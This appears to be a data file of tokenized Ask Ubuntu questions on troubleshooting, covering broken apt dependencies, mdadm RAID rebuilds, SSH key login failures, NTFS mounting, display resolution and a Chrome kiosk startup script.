4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4.4 is installed . libqt4-dbus : breaks : libqt4-dbus : i386 ( ! = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.1 is to be installed . libqt4-dbus : i386 : breaks : libqt4-dbus ( ! = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4.4 is installed . libfreetype6 : breaks : libfreetype6 : i386 ( ! = 2.4.8-1ubuntu2.1 ) but 2.4.8-1ubuntu2 is to be installed . libfreetype6 : i386 : breaks : libfreetype6 ( ! = 2.4.8-1ubuntu2 ) but 2.4.8-1ubuntu2.1 is installed . libexpat1 : breaks : libexpat1 : i386 ( ! = 2.0.1-7.2ubuntu1.1 ) but 2.0.1-7.2ubuntu1 is to be installed . libexpat1 : i386 : breaks : libexpat1 ( ! = 2.0.1-7.2ubuntu1 ) but 2.0.1-7.2ubuntu1.1 is installed . libqt4-xmlpatterns : breaks : libqt4-xmlpatterns : i386 ( ! = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.1 is to be installed . libqt4-xmlpatterns : i386 : breaks : libqt4-xmlpatterns ( ! = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4.4 is installed . libqtcore4 : breaks : libqtcore4 : i386 ( ! = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.1 is to be installed . libqtcore4 : i386 : breaks : libqtcore4 ( ! = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4.4 is installed . libqt4-sql : breaks : libqt4-sql : i386 ( ! = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.1 is to be installed . libqt4-sql : i386 : breaks : libqt4-sql ( ! = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4.4 is installed . libqt4-xml : breaks : libqt4-xml : i386 ( ! = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.1 is to be installed . libqt4-xml : i386 : breaks : libqt4-xml ( ! = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4.4 is installed . libtiff4 : breaks : libtiff4 : i386 ( ! = 3.9.5-2ubuntu1.5 ) but 3.9.5-2ubuntu1.1 is to be installed . libtiff4 : i386 : breaks : libtiff4 ( ! = 3.9.5-2ubuntu1.1 ) but 3.9.5-2ubuntu1.5 is installed . libqtgui4 : breaks : libqtgui4 : i386 ( ! = 4:4.8.1-0ubuntu4.4 ) but 4:4.8.1-0ubuntu4.1 is to be installed . libqtgui4 : i386 : breaks : libqtgui4 ( ! = 4:4.8.1-0ubuntu4.1 ) but 4:4.8.1-0ubuntu4.4 is installed . libc6 : breaks : libc6 : i386 ( ! = 2.15-0ubuntu10.2 ) but 2.15-0ubuntu10 is to be installed . libc6 : i386 : breaks : libc6 ( ! = 2.15-0ubuntu10 ) but 2.15-0ubuntu10.2 is installed . internal error : the solver install ( libc-bin : amd64 2.15-0ubuntu10 < libc6 : i386 2.15-0ubuntu10 - > { libc-bin : amd64 2.15-0ubuntu10 libc-bin : i386 2.15-0ubuntu10 } > ) of a supposedly unresolved dependency is already installed in step 10 internal error : the solver install ( libc-bin : amd64 2.15-0ubuntu10 < libc6 : i386 2.15-0ubuntu10 - > { libc-bin : amd64 2.15-0ubuntu10 libc-bin : i386 2.15-0ubuntu10 } > ) of a supposedly unresolved dependency is already installed in step 17 internal error : the solver install ( libc-bin : amd64 2.15-0ubuntu10 < libc6 : i386 2.15-0ubuntu10 - > { libc-bin : amd64 2.15-0ubuntu10 libc-bin : i386 2.15-0ubuntu10 } > ) of a supposedly unresolved dependency is already installed in step 24 the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) libasound2 : i386 [ not installed ] 2 ) libaudio2 : i386 [ not installed ] 3 ) libc-bin : i386 [ not installed ] 4 ) libc6 : i386 [ not installed ] 5 ) libdbus-1-3 : i386 [ not installed ] 6 ) libexpat1 : i386 [ not installed ] 7 ) libffi6 : i386 [ not installed ] 8 ) libfontconfig1 : i386 [ not installed ] 9 ) libfreetype6 : i386 [ not installed ] 10 ) libgcc1 : i386 [ not installed ] 11 ) libglib2.0-0 : i386 [ not installed ] 12 ) libice6 : i386 [ not installed ] 13 ) libjpeg-turbo8 : i386 [ not installed ] 14 ) libjpeg8 : i386 [ not installed ] 15 ) liblcms1 : i386 [ not installed ] 16 ) libmng1 : i386 [ not installed ] 17 ) libpcre3 : i386 [ not installed ] 18 ) libpng12-0 : i386 [ not installed ] 19 ) libqt4-dbus : i386 [ not installed ] 20 ) libqt4-declarative : i386 [ not installed ] 21 ) libqt4-network : i386 [ not installed ] 22 ) libqt4-script : i386 [ not installed ] 23 ) libqt4-sql : i386 [ not installed ] 24 ) libqt4-xml : i386 [ not installed ] 25 ) libqt4-xmlpatterns : i386 [ not installed ] 26 ) libqtcore4 : i386 [ not installed ] 27 ) libqtgui4 : i386 [ not installed ] 28 ) libselinux1 : i386 [ not installed ] 29 ) libsm6 : i386 [ not installed ] 30 ) libstdc++6 : i386 [ not installed ] 31 ) libtiff4 : i386 [ not installed ] 32 ) libuuid1 : i386 [ not installed ] 33 ) libx11-6 : i386 [ not installed ] 34 ) libxau6 : i386 [ not installed ] 35 ) libxcb1 : i386 [ not installed ] 36 ) libxdmcp6 : i386 [ not installed ] 37 ) libxext6 : i386 [ not installed ] 38 ) libxi6 : i386 [ not installed ] 39 ) libxrender1 : i386 [ not installed ] 40 ) libxss1 : i386 [ not installed ] 41 ) libxt6 : i386 [ not installed ] 42 ) libxv1 : i386 [ not installed ] 43 ) skype [ not installed ] 44 ) skype-bin : i386 [ not installed ] 45 ) zlib1g : i386 [ not installed ] accept this solution ? [ y/n/q/ ? ] q abandoning all efforts to resolve these dependencies . abort .
306712	raid 5 array mdadm add command no response	on ubuntu server , i have a software raid 5 array , four 2tb drives . one of the drives died , i sent it in and got a replacement . i put the replacement in my server , used an sfdisk command to set the partition table to the same as the other drives . i then tried to add this new drive to the array using the command : sudo mdadm -- manage /dev/md127 -- add /dev/sdd1 where md127 is the array name and sdd1 is the only partition on the new hard drive . however , when running this command , there is no response . i check /proc/mdstat to see if the array is resyncing and it does not seem to be doing anything . what am i doing wrong ?
306721	how do i read this `` install script '' ? spotifycontroller	spotify controller . i downloaded the files from the ubuntu link provided in the aforementioned . within was an instillation file with instructions , but i have no idea how to read it ! yes , i 'm a complete newbie . thanks for the help in advance ! this is what the `` install '' file contains ... . # ! /bin/bash echo echo echo installing spotify controller server ... sleep 1 echo echo this installation file has been created for ubuntu . if you are not using that distribution , installation might not work , but it should be pretty straightforward to modify the script to work for your distribution . echo this program requires spotify and java . press enter to continue ... read inputline echo echo proceeding with installation . creating application shortcut ... sleep 1 echo `` /usr/bin/killspotifycontroller -silent '' > spotifycontroller echo `` echo starting spotify controller ... '' > > spotifycontroller echo `` cd ' $ pwd ' '' > > spotifycontroller echo `` sh spotifycontroller.sh '' > > spotifycontroller chmod +x spotifycontroller sudo mv spotifycontroller /usr/bin/ sudo cp -f resources/killspotifycontroller /usr/bin/ sudo cp -f resources/icon.png /usr/share/pixmaps/spotifycontroller.png sudo cp -f resources/icon_stop.png /usr/share/pixmaps/spotifycontroller_stop.png cp -f resources/spotifycontroller.desktop $ home/desktop/ sudo cp -f resources/spotifycontroller.desktop /usr/share/applications/ echo echo program is now installed . simply run \ '' spotify controller\ '' from your desktop , or type \ '' spotifycontroller\ '' to start the server . make sure you have spotify up and running with songs in the play queue . sleep 1 echo echo `` to automatically start spotify controller server when computer boots , add the application to system - > preferences - > startup applications '' . sleep 1 echo echo `` do n't forget to install the spotify controller app from play store . '' sleep 1 echo echo if you experience any problems , see the file \ '' troubleshooting\ '' . sleep 1 echo echo `` happy listening ! ''
306725	hard drive too slow	my computer has been going too slow since i remember , i tried several tips i found on internet but nothing worked . after spending some time searching about the problem i found that it might be my hard drive so i tried to optimize it with hdparm but it does n't seem to work because i get some errors whil eithere trying to activate dma . after running hdparm -tt on my hard drive this is what i get : timing cached reads : 2 mb in 2.34 seconds = 874.15 kb/sec timing buffered disk reads : 2 mb in 4.15 seconds = 493.51 kb/sec that 's really poor performance compated to my external hd : timing cached reads : 1996 mb in 2.00 seconds = 998.20 mb/sec timing buffered disk reads : 102 mb in 3.02 seconds = 33.83 mb/sec is not it ? if someone can please help me to get this computer to run a bit more decent i 'd appreciate it . here 's some info about the hard drive : /dev/sda : multcount = 16 ( on ) io_support = 1 ( 32-bit ) readonly = 0 ( off ) readahead = 256 ( on ) geometry = 30401/255/63 , sectors = 488397168 , start = 0 model=toshiba mk2565gsx , fwrev=gj002j , serialno=11t3b3e6b config= { fixed } rawchs=16383/16/63 , trksize=0 , sectsize=0 , eccbytes=0 bufftype=unknown , buffsize=8192kb , maxmultsect=16 , multsect=16 curchs=16383/16/63 , cursects=16514064 , lba=yes , lbasects=488397168 iordy=on/off , tpio= { min:120 , w/iordy:120 } , tdma= { min:120 , rec:120 } pio modes : pio0 pio1 pio2 pio3 pio4 dma modes : sdma0 sdma1 sdma2 mdma0 mdma1 mdma2 udma modes : udma0 udma1 udma2 udma3 udma4 *udma5 advancedpm=yes : unknown setting writecache=enabled drive conforms to : unspecified : ata/atapi-3,4,5,6,7 * signifies the current active mode system specifications 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 07:00.0 network controller : atheros communications inc. ar9287 wireless network adapter ( pci-express ) ( rev 01 ) 09:00.0 ethernet controller : broadcom corporation netlink bcm57780 gigabit ethernet pcie ( rev 01 ) thanks .
306732	broken packages/unmet dependecies	i have a problem . since i upgraded my ubuntu 12.04 to 13.04 , i 've been receiving lots of errors , i ca n't install any program because it shows me a message that says ( for this example i 'll try to install synaptic ) : > alexis @ mclovin : ~ $ sudo apt-get install synaptic > reading package lists ... done > building dependency tree > reading state information ... done > some packages could not be installed . this may mean that you have > requested an impossible situation or if you are using the unstable > distribution that some required packages have not yet been created > or been moved out of incoming . > the following information may help to resolve the situation : > > the following packages have unmet dependencies : > synaptic : depends : libept1.4.12 ( > = 1.0.9 ) but it is not installable > recommends : rarian-compat but it is not installable > e : unable to correct problems , you have held broken packages . i 'm new in ubuntu , i hope it 's not a dumb question . thank you ( english is not my native language ) .
306734	unable to connect to secured wi-fi from nexus 7 running ubuntu touch 13.04	i have put ubuntu touch on my nexus 7 , using multirom . but i am unable to connect my ubuntu touch tablet to my home wi-fi ( wpa2 personal ) . after i type in the password and click ok , it shows the list of available wi-fi networks again . it does not connect to the wi-fi , for which i have entered the correct password . so , i have to enter the password again . but still , it does not connect . just shows the list of available wi-fi networks again . note : my password is very long . i am not sure if the wi-fi connection is timing out by the time i have entered the password ? i have adb access to the device . so , if anyone needs any more information to diagnose the issue , i gladly provide it !
306743	how to install intel media accelerator driver in ubuntu 12 ?	i have always been windows user , this is the first time i have switched to anything other than windows . the problem is that the display is very very dark and i know it has nothing to do with my monitor 's settings . i get the same problem whenever i re install windows on my desktop but it gets solved when i install intel media accelerator and increase brightness from there . but i do not know where to go , what to download and how to install ? please just help me out with getting rid of this dark screen . name : intel ( r ) g33/g31 express chipset family chip type : intel ( r ) gma 3100
306745	problem with shortcut key `` super+t '' in 13.04	i 'm using ubuntu 13.04 with unity . i set dolphin is default file manager . when i open trash via shortcut key super+t , i receive error : malformed url trash : // .
306746	change the ubuntu layout back ?	i just upgraded from 10.04 to 12.04 lts . is it possible to change the layout and get it as it was on version 10 ?
306756	how can i know which gpu my vga output uses ?	i have an optimus gpu 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 640m ] ( rev ff ) and i use an external monitor . i have installed bumblebee ( and i use it to run certain sofware with optirun ) . i would like to know whether the external monitor ( using a vga cable ) is using the ivy bridge or nvidia gpu . how can i find that out ?
306764	ubuntu 13.04 installer problem	i am trying to install ubuntu 13.04 from a usb as any of the previous ubuntu releases but it does n't install . i 've tried the amd64 and the x86 installer . this is a picture of what happens exactly . is there any solution ? ! my cpu is pentium dual cpu e2180 vga : nvidia g100 sound card : realtek hd motherboard : intel g41 nic : realtek pcie fe monitor : lg flatron two disk drives : 160 & 250 gb
306768	unable to install drivers	same problem as many times before . however , this time my problem is that i am unable to start the installation in terminal . i have done all the preparations to install the drivers , extractions etc and now i am just about to start the installation of the .run-file . however , nothing happens . no installation , no errors , nothing . itĺ like terminal recived the command but ignores it . normally it says , `` command not found '' or that the file `` dosent exist '' , but now it says nothing , it just jumps down a row and awaits new commands . what should i do ?
306770	does networkmanager have a limited bandwidth mode ?	as soon as i go online via my portable 3g hotspot , all running programs happily start pulling updates ( e.g . gwibber , thunderbird , update manager ... ) and eat into my traffic quota . is there a way to activate a network connection , but only tell specific programs about it ( e.g . firefox , if i just want to quickly look something up ) ? note that i 'm not looking for bandwidth limiting , i just want to prevent the automatic `` ooh , i 'm online , let 's get some data '' behavior . edit : i have already received two useful answers , however , i 'd still like to add some clarification : what does networkmanager do to tell running programs they 're now online ? i assume it 's some sort of dbus message . can i prevent that from being sent ?
306772	disk partion problem ?	just now , i 've installed ubuntu on my laptop which has already windows 8 . when i want to open any partition like d , e or f , i get the following error message : unable to access âlocal disk dâ error mounting /dev/sda3 at /media/yuva/local disk d : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/yuva/local disk d '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
306774	change default driver of network printer	in ubuntu 12.04 , how do i set the driver for a network printer ? it used to be all in the wizard provided by system-config-printer , but now of course the system itself decides which driver to pick and i really need a different one than the default driver . how do i do this ?
306777	download a package with its all dependencies for later offline use	i would like to download package with its all dependencies to my computer and when i need it i would run command dpkg -i *.deb . all i need is to download everything necessary to install , say vlc or g++ or ubuntu-restricted-extras . please help . thanks in advance . p.s . i am sure it is a duplicate but i could not understand anything from other blogs .
306780	program compatibility	i just installed fifa manager 13 on ubuntu 13.04 , but it does n't work because i need to change the program compatibility before it runs . how do i do that in ubuntu ? ?
306792	i ca n't boot ubuntu 13.04 from a usb stick	i had been using universal usb installer in order to create a bootable ubuntu 13.04 usb . however , when i actually tried to boot it through bios on windows 7 it just did not do anything . screen would just freeze black . i did it with every 13.04 version available , but no results followed . earlier , i had been using same method with 12.04 and that time it had worked . can anybody suggest something ? maybe another software for creating a bootable usb or some different means ? cheers !
306798	trying to do ssh authentication with key files : server refused our key	i 'm trying to setup ssh authentication with key files in stead of username/password . the client is a windows box running putty and the server is a ubuntu 12.04 lts server . i downloaded puttygen.exe and had it generate a key pair . in /etc/ssh/sshd_config i have this line : authorizedkeysfile % h/.ssh/authorized_keys and on my client 's public key file it says this : -- -- begin ssh2 public key -- -- comment : `` my @ email.address.com '' ssh-rsa aaaab3nzac1yc2eaaaabjqaaaiear3qo6t5xu06ziggod3ekvfbhflhg5kwv8lz6 qj2g9xcbexlpqganphh+vcpkhor6+7omb+wsdheno652ktofnautkctcbhjst7cj gnro8wvurrh4fabknuhpmauerwqz6tgrpgaz0aucu+2c+duo2skvfdir1vb+4u83 av1pkxs=my @ email.address.com -- -- end ssh2 public key -- -- i copied the part from `` ssh-rsa aaa '' to `` my @ email.address.com '' and put that in the file ~/.ssh/authorized_keys on my server ( in my own homefolder ) . in putty under connection > ssh > auth i entered the path to the private key it generated on my client and saved the session settings . i restarted the ssh server with sudo service ssh restart now if i load the profile in putty ( i verified the private key is still in connection > ssh > auth and that the path is correct ) and run the profile , it says server refused our key i tried putting the public key in a file under the directory ./ssh/authorized_keys/ but that did n't help so i used ./ssh/authorized_keys as a file , pasting the key in it . i also tried generating a private/public key pair on the server , putting the public key in ./ssh/authorized_files and loading the private one in putty on my client . rebooting the server did n't help either . i found that the error may be solved by putting the key in a place outside the user 's home folder but that 's only useful if the home folder is encrypted , which this one is not . also tried generating a 4096 bit key , thinking perhaps 1024 was too short . how can i get this to work ? thanks ! edit : ok , /var/log/auth.log said : sshd : authentication refused : bad ownership or modes for directory /home/vorkbaard/.ssh google tells me ~/.ssh/ should be 700 and and ~/.ssh/authorized_keys should be 600 , so i did that . now /var/log/auth.log says : sshd : error : key_read : uudecode aaaab3n [ etc etc etc until about 3/4 of my public key ]
306799	i ca n't format my usb flash	i changed my ubuntu 12.04 to 13.04 and now i want to format my usb flash when i right-click on my usb icon on launcher . i can see only 4 options : open new volume unlock from launcher eject . there is no format option . thank you
306802	nobody can use the internet when i turn on my computer ?	i have just installed ubuntu 12.04 lts along with an old windows installation . every time i boot with ubuntu . nobody can use the internet if the wireless is on . windows works fine though . how can i solve this problem ? thank you .
306810	changing the screen resolution to the true resolution option not available	i have recently updated through software update after installing a fresh installation of ubuntu 12.04 and my screen resolution is completely messed up . the default screen resolutions at the moment are : 1600 x 1200 ( 4:3 ) -- using this now and it is quite hard to see the screen considering there is no hdmi , just vga 1280 x 1024 ( 5:4 ) 1024 x 768 ( 4:3 ) -- unusable as when i select it , i get a `` fuzzy '' screen 800 x 600 ( 4:3 ) i have gone into my xorg.conf file and ensured my vertrefresh and horizontal sync are all in order and are that specified by my monitors manufacturer . this did not change a thing . i have also tried adding a metamode and mode for the 1366x768 and it still has not worked . here is my current xorg.conf file : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 319.17 ( buildmeister @ swio-display-x86-rhel47-06 ) thu apr 25 22:28:25 pdt 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 30.0 - 80.0 vertrefresh 55.0 - 75.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' # option `` metamodes '' `` 1360x768 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1366x768 '' endsubsection endsection i have also tried using xrandr to set the resolution to 1366 x 768 and it does not work . any tips on allowing me to get my resolution back to normal ? cheers !
306814	upgrade from 11.10 to 12.04 : no mouse , no connection , icon missings	i just upgraded my laptop from ubuntu 11.10 to 12.04 and , even though all the steps seemed to have completed seamlessly until restart , once i rebooted i got : no mouse icon ( touchpad or external usb mouse ) no network interface apart from the loopback interface ( i should have both wired and wireless connections available ) application icons missing in gnome now , i can connect the computer to the internet via usb tethering through my cellphone , but it just does n't see the connection . how do do it from a terminal ? ( strangely , there is no network-manager )
306820	gpg-agent : how to limit the passphrase cache retention time	i 'm using thunderbird/enigmail , and the plugin tells me that the process in charge of the passphrase cache is gpg-agent . the retention time of the passphrase is too long for me ( possibly , the entire session ) . i would like to make it shorter , but so far i have failed to do so . gpg-agent seems to be run without a default-cache-ttl argument ( according to ps ) , so according to the manual it should use the default value , 600 seconds . it 's obviously not the case . it should also use the default value for max_cache_ttl ( 2 hours ) , but it 's not the case either . i tried to create a gpg-agent.conf file in my ~/.gnupg with a custom value for default-cache-ttl , but it seems to have no effect ( i have restarted my session in order to restart gpg-agent ) . either i 'm trying to tweak the wrong process , or it does n't behave according to its specifications , or there is something i do n't understand . how can i efficiently shorten this passphrase retention time ?
306822	where can i download the latest dvd iso which contains everything ?	where can i download a dvd iso which contains everything ? am i right , the isos on the download sections are cd isos only which contains the os and the most basic applications ? thanks ...
306823	where can i order a cd of ubuntu ?	i live off grid , have only a slow dial-up internet , and only have power when running generator , ( at this time ) , which means power about 4 hours a day . can i get just one copy of 12.04 without downloading ?
306824	how do you add files to existing programs	how does the file system work with ubuntu . how do you find where a program is and if needed how do you add file to it ?
306827	why does n't my ftp transfer work ?	i am working on ubuntu 11.10 i need to transfer some files to my windows 7 system on the lan . while connecting with ftp get an error i.e ftp : connection : connection refused ftp 192.168.0.72 ftp : connection : connection refused ftp > but i can ping the windoes system ping 192.168.0.72 5 packets transmitted , 5 packets received 0 % packet loss but i can ftp from windows to ubuntu plz provide any solution
306828	share internet via apple express	i have a 3g dongel connected to my ubuntu laptop . i want to let other computers share my internet via wifi from my apple express which is connected using ethernet . does anyone know how to get it to work ?
306829	how install a new app from livecd into sleeping hard drive installation	i 've : a pc with a running ubuntu installation . a livecd running in the above pc with access to the hard drive ubuntu installation filesystem . and i need to know how install an app from the running livecd to the ubuntu installation , so when i boot the hard drive installed ubuntu that app is correctly installed & available . thanks
306834	partitioning file system drive	when installing ubuntu i was told to set the size constraints for my file system drive and my ... other stuff drive ( the official name ) . however , i slid the slider the wrong way , leaving me with 230gb of file system space ( about 200 more than i 'd need/want ) and 16gb for absolutely everything else . is there any way to change these size constraints or repartition ? thanks , harry
306837	unable to upgrade to a newer distribution	i was trying to upgrade my ubuntu version to 12.04 but it failed to get the last three packages out of 1525 . i tried it many times but failed . is there any way that i can download the three packages separately and continue with my system upgrade ? any help is appreciated . thanks in advance . selam
306840	how to install linux-headers-3.5.0-32-generic	when i try to install some apps i get a message : linux-headers-generic-lts-quantal : depend : linux-headers-3.5.0-32-generic but it is not installable uname -a linux ubuntus 3.5.0-27-generic # 46~precise1-ubuntu smp tue mar 26 19:33:56 utc 2013 i686 i686 i386 gnu/linux dpkg -l | grep linux-image ii linux-image-3.5.0-23-generic 3.5.0-23.35~precise1 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-27-generic 3.5.0-27.46~precise1 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-28-generic 3.5.0-28.48~precise1 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-30-generic 3.5.0-30.51~precise1 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-3.5.0-31-generic 3.5.0-31.52~precise1 linux kernel image for version 3.5.0 on 32 bit x86 smp iu linux-image-3.5.0-32-generic 3.5.0-32.53~precise1 linux kernel image for version 3.5.0 on 32 bit x86 smp iu linux-image-generic-lts-quantal 3.5.0.32.39 generic linux kernel image
306842	my desktop icons have gone out of view	i have just two icons on my desktop the home folder and my kindle . until recently they worked well , however , today , when i turned on my computer , they had vanished . i checked the settings and it said that they were displayed , and when i activated the trash icon , it appears as it should . my assumption is that the two icons have wandered off the top of the screen , for reasons best known to themselves . when i click the desktop and press ctrl + a to select all icons the hit return both the home folder and my kindle fire up . i would appreciate it someone could tell me what commands i should give to get them back on to the screen , no witty comments like here boy !
306843	ubuntu 13.04 slow lan download	i have problem with downloading file between ubuntu 13.04 and network share on windows 7 . when i uploading file from ubu to win7 everything is ok , but in other way when downloading from win7 speed is around 30-40kb/s . thats sad ... anyone solved this issue ? thx for any help
306844	error while installing 3g usb stick driver on ubuntu 12.04	i am getting the error shown below . i 'm new to ubuntu . how do i resolve it ? > install.sh : 187 : [ : true : unexpected operator udevadm is exist ! ******begin to /opt/tata_docomo_3g/driver this is linux driver installtion make -c /lib/modules/3.2.0-45-generic-pae/build m=/tmp/onda_driver_install_v3.1.2 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-45-generic-pae' cc [ m ] /tmp/onda_driver_install_v3.1.2/onda.o /tmp/onda_driver_install_v3.1.2/onda.c:18427:22 : fatal error : usb-wwan.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /tmp/onda_driver_install_v3.1.2/onda.o ] error 1 make [ 1 ] : *** [ _module_/tmp/onda_driver_install_v3.1.2 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-45-generic-pae' make : *** [ modules ] error 2 this is customized kernel , kernel version is : 3.2.0-45-generic-pae enter customize_driver_install function cp : can not stat `onda.ko ' : no such file or directory fatal : module onda not found . disselfirefox.pp driver_install.run nm.pp readme_onda.txt se end to /opt/tata_docomo_3g/driver install.sh : 426 : [ : true : unexpected operator install completed ! ! ! ... .after setup , you will find the tata docomo 3g in `` applications- > internet- > tata docomo 3g '' . click the tata docomo 3g and the application will run install.sh : 434 : read : illegal option -n ./tata_docomo_3g : error while loading shared libraries : libqt-mt.so.3 : can not open shared object file : no such file or directory
306847	help with kubuntu slow system	i was wondering if i could get some help with my kubuntu installation on a friend 's old laptop . got kubuntu 12,04 running on an old asus x51r , dual boot with vista , which i wo n't be using at all incidentally . i 'm a bit surprised as the system lags quite a bit , and i thought kubuntu was designed to run on low spec machines . however this one has 1024 mb ram . could any of you recommend a course of action to speed things up a bit ? many thanks , .
306849	need to undo ttyusb working setup	i had a working asterisk setup with ttyusb in /dev folder everytime i connect the device to the usb port . now i tried the following steps and my ttyusb1 and 2 disappeared /etc/init.d/asterisk stop rmmod option insmod ./option.ko insmod ./huawei_voice.ko /etc/init.d/asterisk start in hopes to recover , i tried these and still i did not get my ttyusb working . rmmod ./option.ko rmmod ./huawei_voice.ko i guess i need to do a insmod option , but i get a insmod : ca n't read 'option ' : no such file or directory i guess i need to look into /lib/modules/ folder for options ? /lib/modules/3.2.0-43-generic-pae/modules.alias /lib/modules/3.2.0-43-generic-pae/modules.isapnpmap /lib/modules/3.2.0-43-generic-pae/modules.alias.bin /lib/modules/3.2.0-43-generic-pae/modules.ofmap /lib/modules/3.2.0-43-generic-pae/modules.builtin /lib/modules/3.2.0-43-generic-pae/modules.order /lib/modules/3.2.0-43-generic-pae/modules.builtin.bin /lib/modules/3.2.0-43-generic-pae/modules.pcimap /lib/modules/3.2.0-43-generic-pae/modules.ccwmap /lib/modules/3.2.0-43-generic-pae/modules.seriomap /lib/modules/3.2.0-43-generic-pae/modules.dep /lib/modules/3.2.0-43-generic-pae/modules.softdep /lib/modules/3.2.0-43-generic-pae/modules.dep.bin /lib/modules/3.2.0-43-generic-pae/modules.symbols /lib/modules/3.2.0-43-generic-pae/modules.devname /lib/modules/3.2.0-43-generic-pae/modules.symbols.bin /lib/modules/3.2.0-43-generic-pae/modules.ieee1394map /lib/modules/3.2.0-43-generic-pae/modules.usbmap /lib/modules/3.2.0-43-generic-pae/modules.inputmap what do i do to fix it ? which folder and file am i looking for here ?
306851	how to import a variable from a script ?	i want to get a variable from another script , as demonstrated in http : //stackoverflow.com/questions/5228345/bash-script-how-to-reference-a-file-for-variables however , the answer uses source command only available in bash . i want to do this in a portable way . i have also tried a.sh export var= '' foo '' echo `` executing a '' b.sh # ! /bin/sh ./a.sh echo $ var but of course that does not work either . how to do this ?
306852	where is the update-manager ?	i ca n't seem to upgrade to the latest version ubuntu . it asked me once , but i was doing something else at the time . now that i ant to do it i ca n't find it . i can find software updater , but that just seems to update programs that are on the computer .
306857	enable skype sounds *without* enabling *all* system sound effects	i 'd like to enable the ringing and notification sounds in skype without enabling generic system sounds , i.e . without turning on all system sound effects in pulseaudio volume control . is there a way to make pulseaudio handle sound effects per application ? skype does n't appear in pulseaudio volume control other than when i make calls . any help much appreciated . ( using skype 4.2.1 , gnome shell 3.4.1 on ubuntu 12.04 . )
306859	hide desktop startup screen	i am working on a hardware device running on ubuntu . one of the most important features is good presentation - in my case not showing the os startup screen etc . currently i am using upstart to start the main application . the ui piece gets started through .config/autostart config file . this is the script : # ! /bin/bash running= '' stopped '' while test `` $ running '' ! = `` running '' ; do running= $ ( service gbmcp status | grep -oi running ) echo `` current state of mcp is $ running '' | tee /tmp/startup.log sleep 1 done # to be on a safe side sleep 1 more second sleep 1 google-chrome -- kiosk localhost:8000 the problem is that this script does n't kick in until at least a minute passes , which shows regular ubuntu desktop with icons etc . is there a way to avoid showing the regular desktop and show google-chrome instead ?
